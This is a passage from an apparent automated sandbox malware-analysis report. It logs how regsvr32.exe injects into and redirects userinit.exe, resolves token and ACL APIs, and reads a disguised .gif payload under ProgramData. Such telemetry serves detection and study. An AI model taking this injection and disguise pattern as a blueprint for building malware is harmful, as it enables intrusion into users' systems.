Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #35: userinit.exe

222

0

»

Information	Value
ID	#35
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:57, Reason: Child Process
Unmonitor	End Time: 00:02:01, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xfd0
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FD4 0x FE4 0x FE8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rwx	-
pagefile_0x0000000000120000	0x00120000	0x00121fff	Pagefile Backed Memory	r	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	rw	-
pagefile_0x0000000000170000	0x00170000	0x00237fff	Pagefile Backed Memory	r	-
private_0x00000000002b0000	0x002b0000	0x002bffff	Private Memory	rw	-
pagefile_0x00000000002c0000	0x002c0000	0x003c0fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
userinit.exe	0x004b0000	0x004b8fff	Memory Mapped File	rwx	-
private_0x00000000004c0000	0x004c0000	0x005bffff	Private Memory	-	-
private_0x00000000005d0000	0x005d0000	0x0060ffff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0061ffff	Private Memory	rw	-
private_0x0000000000620000	0x00620000	0x0069ffff	Private Memory	rw	-
private_0x00000000006a0000	0x006a0000	0x0079ffff	Private Memory	rw	-
pagefile_0x00000000007a0000	0x007a0000	0x0139ffff	Pagefile Backed Memory	r	-
private_0x00000000013a0000	0x013a0000	0x0156ffff	Private Memory	rw	-
pagefile_0x00000000013a0000	0x013a0000	0x0147efff	Pagefile Backed Memory	r	-
private_0x0000000001480000	0x01480000	0x01500fff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x01504fff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x01508fff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x0150cfff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x01510fff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x01514fff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x01518fff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x0151cfff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x01520fff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x01524fff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x01528fff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x0152cfff	Private Memory	rw	-
private_0x0000000001530000	0x01530000	0x0156ffff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0168ffff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x015f2fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x015f6fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x015fafff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x015fefff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01602fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01606fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0160afff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0160efff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01612fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01616fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0161afff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0161efff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01622fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01626fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0162afff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0162efff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01632fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01636fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0163afff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0163efff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01642fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x01646fff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0164afff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x0164efff	Private Memory	rw	-
private_0x0000000001650000	0x01650000	0x0168ffff	Private Memory	rw	-
staticcache.dat	0x01690000	0x01fbffff	Memory Mapped File	r	-
pagefile_0x0000000001fc0000	0x01fc0000	0x023b2fff	Pagefile Backed Memory	r	-
private_0x00000000023c0000	0x023c0000	0x024ccfff	Private Memory	rw	-
private_0x00000000024d0000	0x024d0000	0x025cffff	Private Memory	rw	-
private_0x00000000025d0000	0x025d0000	0x027cffff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02880fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02884fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02888fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x0288cfff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02890fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02894fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02898fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x0289cfff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028a0fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028a4fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028a8fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028acfff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028b0fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028b4fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028b8fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028bcfff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028c2fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028c6fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028cafff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028cefff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028d4fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028d8fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028dcfff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029a2fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029a6fff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029aafff	Private Memory	rw	-
private_0x00000000028c0000	0x028c0000	0x029aefff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029c4fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029c8fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029ccfff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029d0fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029e6fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029eafff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029effff	Private Memory	-	-
private_0x00000000029b0000	0x029b0000	0x02aa0fff	Private Memory	rw	-
private_0x00000000029e0000	0x029e0000	0x02ae2fff	Private Memory	rw	-
private_0x00000000029f0000	0x029f0000	0x02b02fff	Private Memory	rwx	-
private_0x0000000002b10000	0x02b10000	0x02c0ffff	Private Memory	-	-
private_0x0000000002cd0000	0x02cd0000	0x02dcffff	Private Memory	rw	-
sortdefault.nls	0x02dd0000	0x0309efff	Memory Mapped File	r	-
olepro32.dll	0x6ceb0000	0x6cec8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6ced0000	0x6cf53fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffdf008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0xfd4, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6ceb0000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6ced0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ¬ì, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cf0266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cf02542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cf01d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cf0238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cf020c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cf01fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cf01e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cf01f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cf01ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cf0216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cf022be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cf021e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6ceb20ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6ceb20b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6ceb20c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6ceb20d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #36: userinit.exe

222

0

»

Information	Value
ID	#36
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:07, Reason: Child Process
Unmonitor	End Time: 00:02:11, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
